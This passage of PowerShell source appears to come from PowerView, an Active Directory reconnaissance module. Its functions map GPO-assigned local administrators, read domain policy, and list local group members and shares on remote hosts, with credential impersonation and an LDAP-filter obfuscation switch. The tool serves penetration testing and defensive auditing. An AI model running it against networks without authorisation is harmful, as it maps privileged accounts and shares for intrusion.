[Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $CommonArguments = @{}\n        if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['ComputerIdentity']) {\n            $Computers = Get-DomainComputer @CommonArguments -Identity $ComputerIdentity -Properties 'distinguishedname,dnshostname'\n\n            if (-not $Computers) {\n                throw \"[Get-DomainGPOComputerLocalGroupMapping] Computer $ComputerIdentity not found. Try a fully qualified host name.\"\n            }\n\n            ForEach ($Computer in $Computers) {\n\n                $GPOGuids = @()\n\n                # extract any GPOs linked to this computer's OU through gpLink\n                $DN = $Computer.distinguishedname\n                $OUIndex = $DN.IndexOf('OU=')\n                if ($OUIndex -gt 0) {\n                    $OUName = $DN.SubString($OUIndex)\n                }\n                if ($OUName) {\n                    $GPOGuids += Get-DomainOU @CommonArguments -SearchBase $OUName -LDAPFilter '(gplink=*)' | ForEach-Object {\n                        Select-String -InputObject $_.gplink -Pattern '(\\{){0,1}[0-9a-fA-F]{8}\\-[0-9a-fA-F]{4}\\-[0-9a-fA-F]{4}\\-[0-9a-fA-F]{4}\\-[0-9a-fA-F]{12}(\\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value }\n                    }\n                }\n\n                # extract any GPOs linked to this computer's site through gpLink\n                Write-Verbose \"Enumerating the sitename for: $($Computer.dnshostname)\"\n                $ComputerSite = (Get-NetComputerSiteName -ComputerName $Computer.dnshostname).SiteName\n                if ($ComputerSite -and ($ComputerSite -notmatch 'Error')) {\n                    $GPOGuids += Get-DomainSite @CommonArguments -Identity $ComputerSite -LDAPFilter '(gplink=*)' | ForEach-Object {\n                        Select-String -InputObject $_.gplink -Pattern '(\\{){0,1}[0-9a-fA-F]{8}\\-[0-9a-fA-F]{4}\\-[0-9a-fA-F]{4}\\-[0-9a-fA-F]{4}\\-[0-9a-fA-F]{12}(\\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value }\n                    }\n                }\n\n                # process any GPO local group settings from the GPO GUID set\n                $GPOGuids | Get-DomainGPOLocalGroup @CommonArguments | Sort-Object -Property GPOName -Unique | ForEach-Object {\n                    $GPOGroup = $_\n\n                    if($GPOGroup.GroupMembers) {\n                        $GPOMembers = $GPOGroup.GroupMembers\n                    }\n                    else {\n                        $GPOMembers = $GPOGroup.GroupSID\n                    }\n\n                    $GPOMembers | ForEach-Object {\n                        $Object = Get-DomainObject @CommonArguments -Identity $_\n                        $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype\n\n                        $GPOComputerLocalGroupMember = New-Object PSObject\n                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ComputerName' $Computer.dnshostname\n                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectName' $Object.samaccountname\n                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname\n                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectSID' $_\n                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup\n                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName\n                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName\n                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath\n                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType\n                        $GPOComputerLocalGroupMember.PSObject.TypeNames.Add('PowerView.GPOComputerLocalGroupMember')\n                        $GPOComputerLocalGroupMember\n                    }\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainPolicyData {\n<#\n.SYNOPSIS\n\nReturns the default domain policy or the domain controller policy for the current\ndomain or a specified domain/domain controller.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID  \n\n.DESCRIPTION\n\nReturns the default domain policy or the domain controller policy for the current\ndomain or a specified domain/domain controller using Get-DomainGPO.\n\n.PARAMETER Domain\n\nThe domain to query for default policies, defaults to the current domain.\n\n.PARAMETER Policy\n\nExtract 'Domain', 'DC' (domain controller) policies, or 'All' for all policies.\nOtherwise queries for the particular GPO name or GUID.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-DomainPolicyData\n\nReturns the default domain policy for the current domain.\n\n.EXAMPLE\n\nGet-DomainPolicyData -Domain dev.testlab.local\n\nReturns the default domain policy for the dev.testlab.local domain.\n\n.EXAMPLE\n\nGet-DomainGPO | Get-DomainPolicy\n\nParses any GptTmpl.infs found for any policies in the current domain.\n\n.EXAMPLE\n\nGet-DomainPolicyData -Policy DC -Domain dev.testlab.local\n\nReturns the policy for the dev.testlab.local domain controller.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainPolicyData -Credential $Cred\n\n.OUTPUTS\n\nHashtable\n\nOuputs a hashtable representing the parsed GptTmpl.inf file.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([Hashtable])]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Source', 'Name')]\n        [String]\n        $Policy = 'Domain',\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$SearcherArguments['Obfuscate'] = $Obfuscate }\n\n        $ConvertArguments = @{}\n        if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server }\n        if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Domain']) {\n            $SearcherArguments['Domain'] = $Domain\n            $ConvertArguments['Domain'] = $Domain\n        }\n\n        if ($Policy -eq 'All') {\n            $SearcherArguments['Identity'] = '*'\n        }\n        elseif ($Policy -eq 'Domain') {\n            $SearcherArguments['Identity'] = '{31B2F340-016D-11D2-945F-00C04FB984F9}'\n        }\n        elseif (($Policy -eq 'DomainController') -or ($Policy -eq 'DC')) {\n            $SearcherArguments['Identity'] = '{6AC1786C-016F-11D2-945F-00C04FB984F9}'\n        }\n        else {\n            $SearcherArguments['Identity'] = $Policy\n        }\n\n        $GPOResults = Get-DomainGPO @SearcherArguments\n\n        ForEach ($GPO in $GPOResults) {\n            # grab the GptTmpl.inf file and parse it\n            $GptTmplPath = $GPO.gpcfilesyspath + \"\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\"\n\n            $ParseArgs =  @{\n                'GptTmplPath' = $GptTmplPath\n                'OutputObject' = $True\n            }\n            if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential }\n\n            # parse the GptTmpl.inf\n            Get-GptTmpl @ParseArgs | ForEach-Object {\n                $_ | Add-Member Noteproperty 'GPOName' $GPO.name\n                $_ | Add-Member Noteproperty 'GPODisplayName' $GPO.displayname\n                $_\n            }\n        }\n    }\n}\n\n\n########################################################\n#\n# Functions that enumerate a single host, either through\n# WinNT, WMI, remote registry, or API calls\n# (with PSReflect).\n#\n########################################################\n\nfunction Get-NetLocalGroup {\n<#\n.SYNOPSIS\n\nEnumerates the local groups on the local (or remote) machine.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect  \n\n.DESCRIPTION\n\nThis function will enumerate the names and descriptions for the\nlocal groups on the current, or remote, machine. By default, the Win32 API\ncall NetLocalGroupEnum will be used (for speed). Specifying \"-Method WinNT\"\ncauses the WinNT service provider to be used instead, which returns group\nSIDs along with the group names and descriptions/comments.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for sessions (also accepts IP addresses).\nDefaults to the localhost.\n\n.PARAMETER Method\n\nThe collection method to use, defaults to 'API', also accepts 'WinNT'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to a remote machine. Only applicable with \"-Method WinNT\".\n\n.EXAMPLE\n\nGet-NetLocalGroup\n\nComputerName                  GroupName                     Comment\n------------                  ---------                     -------\nWINDOWS1                      Administrators                Administrators have comple...\nWINDOWS1                      Backup Operators              Backup Operators can overr...\nWINDOWS1                      Cryptographic Operators       Members are authorized to ...\n...\n\n.EXAMPLE\n\nGet-NetLocalGroup -Method Winnt\n\nComputerName           GroupName              GroupSID              Comment\n------------           ---------              --------              -------\nWINDOWS1               Administrators         S-1-5-32-544          Administrators hav...\nWINDOWS1               Backup Operators       S-1-5-32-551          Backup Operators c...\nWINDOWS1               Cryptographic Opera... S-1-5-32-569          Members are author...\n...\n\n.EXAMPLE\n\nGet-NetLocalGroup -ComputerName primary.testlab.local\n\nComputerName                  GroupName                     Comment\n------------                  ---------                     -------\nprimary.testlab.local         Administrators                Administrators have comple...\nprimary.testlab.local         Users                         Users are prevented from m...\nprimary.testlab.local         Guests                        Guests have the same acces...\nprimary.testlab.local         Print Operators               Members can administer dom...\nprimary.testlab.local         Backup Operators              Backup Operators can overr...\n\n.OUTPUTS\n\nPowerView.LocalGroup.API\n\nCustom PSObject with translated group property fields from API results.\n\nPowerView.LocalGroup.WinNT\n\nCustom PSObject with translated group property fields from WinNT results.\n\n.LINK\n\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.LocalGroup.API')]\n    [OutputType('PowerView.LocalGroup.WinNT')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = $Env:COMPUTERNAME,\n\n        [ValidateSet('API', 'WinNT')]\n        [Alias('CollectionMethod')]\n        [String]\n        $Method = 'API',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            if ($Method -eq 'API') {\n                # if we're using the Netapi32 NetLocalGroupEnum API call to get the local group information\n\n                # arguments for NetLocalGroupEnum\n                $QueryLevel = 1\n                $PtrInfo = [IntPtr]::Zero\n                $EntriesRead = 0\n                $TotalRead = 0\n                $ResumeHandle = 0\n\n                # get the local user information\n                $Result = $Netapi32::NetLocalGroupEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)\n\n                # locate the offset of the initial intPtr\n                $Offset = $PtrInfo.ToInt64()\n\n                # 0 = success\n                if (($Result -eq 0) -and ($Offset -gt 0)) {\n\n                    # Work out how much to increment the pointer by finding out the size of the structure\n                    $Increment = $LOCALGROUP_INFO_1::GetSize()\n\n                    # parse all the result structures\n                    for ($i = 0; ($i -lt $EntriesRead); $i++) {\n                        # create a new int ptr at the given offset and cast the pointer as our result structure\n                        $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset\n                        $Info = $NewIntPtr -as $LOCALGROUP_INFO_1\n\n                        $Offset = $NewIntPtr.ToInt64()\n                        $Offset += $Increment\n\n                        $LocalGroup = New-Object PSObject\n                        $LocalGroup | Add-Member Noteproperty 'ComputerName' $Computer\n                        $LocalGroup | Add-Member Noteproperty 'GroupName' $Info.lgrpi1_name\n                        $LocalGroup | Add-Member Noteproperty 'Comment' $Info.lgrpi1_comment\n                        $LocalGroup.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.API')\n                        $LocalGroup\n                    }\n                    # free up the result buffer\n                    $Null = $Netapi32::NetApiBufferFree($PtrInfo)\n                }\n                else {\n                    Write-Verbose \"[Get-NetLocalGroup] Error: $(([ComponentModel.Win32Exception] $Result).Message)\"\n                }\n            }\n            else {\n                # otherwise we're using the WinNT service provider\n                $ComputerProvider = [ADSI]\"WinNT://$Computer,computer\"\n\n                $ComputerProvider.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object {\n                    $LocalGroup = ([ADSI]$_)\n                    $Group = New-Object PSObject\n                    $Group | Add-Member Noteproperty 'ComputerName' $Computer\n                    $Group | Add-Member Noteproperty 'GroupName' ($LocalGroup.InvokeGet('Name'))\n                    $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalGroup.InvokeGet('objectsid'),0)).Value)\n                    $Group | Add-Member Noteproperty 'Comment' ($LocalGroup.InvokeGet('Description'))\n                    $Group.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.WinNT')\n                    $Group\n                }\n            }\n        }\n    }\n    \n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Get-NetLocalGroupMember {\n<#\n.SYNOPSIS\n\nEnumerates members of a specific local group on the local (or remote) machine.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect, Convert-ADName  \n\n.DESCRIPTION\n\nThis function will enumerate the members of a specified local group  on the\ncurrent, or remote, machine. By default, the Win32 API call NetLocalGroupGetMembers\nwill be used (for speed). Specifying \"-Method WinNT\" causes the WinNT service provider\nto be used instead, which returns a larger amount of information.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for sessions (also accepts IP addresses).\nDefaults to the localhost.\n\n.PARAMETER GroupName\n\nThe local group name to query for users. If not given, it defaults to \"Administrators\".\n\n.PARAMETER Method\n\nThe collection method to use, defaults to 'API', also accepts 'WinNT'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to a remote machine. Only applicable with \"-Method WinNT\".\n\n.EXAMPLE\n\nGet-NetLocalGroupMember | ft\n\nComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain\n------------   ---------      ----------     ---                   -------       --------\nWINDOWS1       Administrators WINDOWS1\\Ad... S-1-5-21-25...          False          False\nWINDOWS1       Administrators WINDOWS1\\lo... S-1-5-21-25...          False          False\nWINDOWS1       Administrators TESTLAB\\Dom... S-1-5-21-89...           True           True\nWINDOWS1       Administrators TESTLAB\\har... S-1-5-21-89...          False           True\n\n.EXAMPLE\n\nGet-NetLocalGroupMember -Method winnt | ft\n\nComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain\n------------   ---------      ----------     ---                   -------       --------\nWINDOWS1       Administrators WINDOWS1\\Ad... S-1-5-21-25...          False          False\nWINDOWS1       Administrators WINDOWS1\\lo... S-1-5-21-25...          False          False\nWINDOWS1       Administrators TESTLAB\\Dom... S-1-5-21-89...           True           True\nWINDOWS1       Administrators TESTLAB\\har... S-1-5-21-89...          False           True\n\n.EXAMPLE\n\nGet-NetLocalGroup | Get-NetLocalGroupMember | ft\n\nComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain\n------------   ---------      ----------     ---                   -------       --------\nWINDOWS1       Administrators WINDOWS1\\Ad... S-1-5-21-25...          False          False\nWINDOWS1       Administrators WINDOWS1\\lo... S-1-5-21-25...          False          False\nWINDOWS1       Administrators TESTLAB\\Dom... S-1-5-21-89...           True           True\nWINDOWS1       Administrators TESTLAB\\har... S-1-5-21-89...          False           True\nWINDOWS1       Guests         WINDOWS1\\Guest S-1-5-21-25...          False          False\nWINDOWS1       IIS_IUSRS      NT AUTHORIT... S-1-5-17                False          False\nWINDOWS1       Users          NT AUTHORIT... S-1-5-4                 False          False\nWINDOWS1       Users          NT AUTHORIT... S-1-5-11                False          False\nWINDOWS1       Users          WINDOWS1\\lo... S-1-5-21-25...          False        UNKNOWN\nWINDOWS1       Users          TESTLAB\\Dom... S-1-5-21-89...           True        UNKNOWN\n\n.EXAMPLE\n\nGet-NetLocalGroupMember -ComputerName primary.testlab.local | ft\n\nComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain\n------------   ---------      ----------     ---                   -------       --------\nprimary.tes... Administrators TESTLAB\\Adm... S-1-5-21-89...          False          False\nprimary.tes... Administrators TESTLAB\\loc... S-1-5-21-89...          False          False\nprimary.tes... Administrators TESTLAB\\Ent... S-1-5-21-89...           True          False\nprimary.tes... Administrators TESTLAB\\Dom... S-1-5-21-89...           True          False\n\n.OUTPUTS\n\nPowerView.LocalGroupMember.API\n\nCustom PSObject with translated group property fields from API results.\n\nPowerView.LocalGroupMember.WinNT\n\nCustom PSObject with translated group property fields from WinNT results.\n\n.LINK\n\nhttp://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together\nhttp://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.LocalGroupMember.API')]\n    [OutputType('PowerView.LocalGroupMember.WinNT')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = $Env:COMPUTERNAME,\n\n        [Parameter(ValueFromPipelineByPropertyName = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $GroupName = 'Administrators',\n\n        [ValidateSet('API', 'WinNT')]\n        [Alias('CollectionMethod')]\n        [String]\n        $Method = 'API',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            if ($Method -eq 'API') {\n                # if we're using the Netapi32 NetLocalGroupGetMembers API call to get the local group information\n\n                # arguments for NetLocalGroupGetMembers\n                $QueryLevel = 2\n                $PtrInfo = [IntPtr]::Zero\n                $EntriesRead = 0\n                $TotalRead = 0\n                $ResumeHandle = 0\n\n                # get the local user information\n                $Result = $Netapi32::NetLocalGroupGetMembers($Computer, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)\n\n                # locate the offset of the initial intPtr\n                $Offset = $PtrInfo.ToInt64()\n\n                $Members = @()\n\n                # 0 = success\n                if (($Result -eq 0) -and ($Offset -gt 0)) {\n\n                    # Work out how much to increment the pointer by finding out the size of the structure\n                    $Increment = $LOCALGROUP_MEMBERS_INFO_2::GetSize()\n\n                    # parse all the result structures\n                    for ($i = 0; ($i -lt $EntriesRead); $i++) {\n                        # create a new int ptr at the given offset and cast the pointer as our result structure\n                        $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset\n                        $Info = $NewIntPtr -as $LOCALGROUP_MEMBERS_INFO_2\n\n                        $Offset = $NewIntPtr.ToInt64()\n                        $Offset += $Increment\n\n                        $SidString = ''\n                        $Result2 = $Advapi32::ConvertSidToStringSid($Info.lgrmi2_sid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n                        if ($Result2 -eq 0) {\n                            Write-Verbose \"[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $LastError).Message)\"\n                        }\n                        else {\n                            $Member = New-Object PSObject\n                            $Member | Add-Member Noteproperty 'ComputerName' $Computer\n                            $Member | Add-Member Noteproperty 'GroupName' $GroupName\n                            $Member | Add-Member Noteproperty 'MemberName' $Info.lgrmi2_domainandname\n                            $Member | Add-Member Noteproperty 'SID' $SidString\n                            $IsGroup = $($Info.lgrmi2_sidusage -eq 'SidTypeGroup')\n                            $Member | Add-Member Noteproperty 'IsGroup' $IsGroup\n                            $Member.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroupMember.API')\n                            $Members += $Member\n                        }\n                    }\n\n                    # free up the result buffer\n                    $Null = $Netapi32::NetApiBufferFree($PtrInfo)\n\n                    # try to extract out the machine SID by using the -500 account as a reference\n                    $MachineSid = $Members | Where-Object {$_.SID -match '.*-500' -or ($_.SID -match '.*-501')} | Select-Object -Expand SID\n                    if ($MachineSid) {\n                        $MachineSid = $MachineSid.Substring(0, $MachineSid.LastIndexOf('-'))\n\n                        $Members | ForEach-Object {\n                            if ($_.SID -match $MachineSid) {\n                                $_ | Add-Member Noteproperty 'IsDomain' $False\n                            }\n                            else {\n                                $_ | Add-Member Noteproperty 'IsDomain' $True\n                            }\n                        }\n                    }\n                    else {\n                        $Members | ForEach-Object {\n                            if ($_.SID -notmatch 'S-1-5-21') {\n                                $_ | Add-Member Noteproperty 'IsDomain' $False\n                            }\n                            else {\n                                $_ | Add-Member Noteproperty 'IsDomain' 'UNKNOWN'\n                            }\n                        }\n                    }\n                    $Members\n                }\n                else {\n                    Write-Verbose \"[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $Result).Message)\"\n                }\n            }\n            else {\n                # otherwise we're using the WinNT service provider\n                try {\n                    $GroupProvider = [ADSI]\"WinNT://$Computer/$GroupName,group\"\n\n                    $GroupProvider.psbase.Invoke('Members') | ForEach-Object {\n\n                        $Member = New-Object PSObject\n                        $Member | Add-Member Noteproperty 'ComputerName' $Computer\n                        $Member | Add-Member Noteproperty 'GroupName' $GroupName\n\n                        $LocalUser = ([ADSI]$_)\n                        $AdsPath = $LocalUser.InvokeGet('AdsPath').Replace('WinNT://', '')\n                        $IsGroup = ($LocalUser.SchemaClassName -like 'group')\n\n                        if(([regex]::Matches($AdsPath, '/')).count -eq 1) {\n                            # DOMAIN\\user\n                            $MemberIsDomain = $True\n                            $Name = $AdsPath.Replace('/', '\\')\n                        }\n                        else {\n                            # DOMAIN\\machine\\user\n                            $MemberIsDomain = $False\n                            $Name = $AdsPath.Substring($AdsPath.IndexOf('/')+1).Replace('/', '\\')\n                        }\n\n                        $Member | Add-Member Noteproperty 'AccountName' $Name\n                        $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)\n                        $Member | Add-Member Noteproperty 'IsGroup' $IsGroup\n                        $Member | Add-Member Noteproperty 'IsDomain' $MemberIsDomain\n\n                        # if ($MemberIsDomain) {\n                        #     # translate the binary sid to a string\n                        #     $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)\n                        #     $Member | Add-Member Noteproperty 'Description' ''\n                        #     $Member | Add-Member Noteproperty 'Disabled' ''\n\n                        #     if ($IsGroup) {\n                        #         $Member | Add-Member Noteproperty 'LastLogin' ''\n                        #     }\n                        #     else {\n                        #         try {\n                        #             $Member | Add-Member Noteproperty 'LastLogin' $LocalUser.InvokeGet('LastLogin')\n                        #         }\n                        #         catch {\n                        #             $Member | Add-Member Noteproperty 'LastLogin' ''\n                        #         }\n                        #     }\n                        #     $Member | Add-Member Noteproperty 'PwdLastSet' ''\n                        #     $Member | Add-Member Noteproperty 'PwdExpired' ''\n                        #     $Member | Add-Member Noteproperty 'UserFlags' ''\n                        # }\n                        # else {\n                        #     # translate the binary sid to a string\n                        #     $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)\n                        #     $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description)\n\n                        #     if ($IsGroup) {\n                        #         $Member | Add-Member Noteproperty 'PwdLastSet' ''\n                        #         $Member | Add-Member Noteproperty 'PwdExpired' ''\n                        #         $Member | Add-Member Noteproperty 'UserFlags' ''\n                        #         $Member | Add-Member Noteproperty 'Disabled' ''\n                        #         $Member | Add-Member Noteproperty 'LastLogin' ''\n                        #     }\n                        #     else {\n                        #         $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0]))\n                        #         $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1')\n                        #         $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] )\n                        #         # UAC flags of 0x2 mean the account is disabled\n                        #         $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.UserFlags.value -band 2) -eq 2)\n                        #         try {\n                        #             $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0])\n                        #         }\n                        #         catch {\n                        #             $Member | Add-Member Noteproperty 'LastLogin' ''\n                        #         }\n                        #     }\n                        # }\n\n                        $Member\n                    }\n                }\n                catch {\n                    Write-Verbose \"[Get-NetLocalGroupMember] Error for $Computer : $_\"\n                }\n            }\n        }\n    }\n    \n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Get-NetShare {\n<#\n.SYNOPSIS\n\nReturns open shares on the local (or a remote) machine.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  \n\n.DESCRIPTION\n\nThis function will execute the NetShareEnum Win32API call to query\na given host for open shares. This is a replacement for \"net share \\\\hostname\".\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for shares (also accepts IP addresses).\nDefaults to 'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system using Invoke-UserImpersonation.\n\n.EXAMPLE\n\nGet-NetShare\n\nReturns active shares on the local host.\n\n.EXAMPLE\n\nGet-NetShare -ComputerName sqlserver\n\nReturns active shares on the 'sqlserver' host\n\n.EXAMPLE\n\nGet-DomainComputer | Get-NetShare\n\nReturns all shares for all computers in the domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-NetShare -ComputerName sqlserver -Credential $Cred\n\n.OUTPUTS\n\nPowerView.ShareInfo\n\nA PSCustomObject representing a SHARE_INFO_1 structure, including\nthe name/type/remark for each share, with the ComputerName added.\n\n.LINK\n\nhttp://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/\n#>\n\n    [OutputType('PowerView.ShareInfo')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            # arguments for NetShareEnum\n            $QueryLevel = 1\n            $PtrInfo = [IntPtr]::Zero\n            $EntriesRead = 0\n            $TotalRead = 0\n            $ResumeHandle = 0\n\n            # get the raw share information\n            $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)\n\n            # locate the offset of the initial intPtr\n            $Offset = $PtrInfo.ToInt64()\n\n            # 0 = success\n            if (($Result -eq 0) -and ($Offset 